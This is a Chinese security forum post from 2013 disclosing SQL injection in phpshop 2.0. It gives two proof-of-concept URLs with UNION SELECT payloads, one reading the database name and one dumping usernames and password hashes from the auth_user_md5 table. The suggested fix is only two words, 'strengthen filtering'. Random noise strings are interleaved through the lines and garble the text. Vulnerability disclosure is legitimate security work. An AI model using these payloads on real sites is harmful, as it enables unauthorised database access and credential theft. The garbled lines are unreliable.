找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2047|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability
5 M* E8 v& \6 T# O% J
0 A3 B2 t3 `' l/ E7 d& B# H作者 : By onestree
# J! O9 o; w6 \: Y2 x# F1 |: h下载地址 : http://code.google.com/p/phpshop/downloads/list0 {- n# W6 E0 @* L  z
测试地址: windows 7 / ubuntu
) b% u9 |  H+ |- t  r& q/ ?
' ?( t5 I5 D0 {0 o0 N' u  p! I
1 S  g2 }/ W* ]) Y# Q8 q  fSQLi p0c:
8 ]( B( ]7 [2 j$ P& I
2 V$ w1 {% O. H4 {3 t8 D) I==================
9 b) ~4 I6 m) Y3 ~: r, @ ' L7 o$ W/ d& v  f) y4 u: ^, i4 \
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
/ c  x1 m& N& Z" e/ B: m- munion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --% o5 A1 H# S! h1 R# v

' \: V1 |; [2 I0 hhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--( Z5 r, O5 Z. O, P6 q5 Q

$ p& k$ ^- X# h8 e修复:' |9 h& M* \4 \! W4 T( q! ?
加强过滤
( }9 t# r0 u. I$ O" M* k; E2 H3 q' o' |" m) c9 F; M8 r0 g
2 h. k) Y) Z6 i3 g# G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表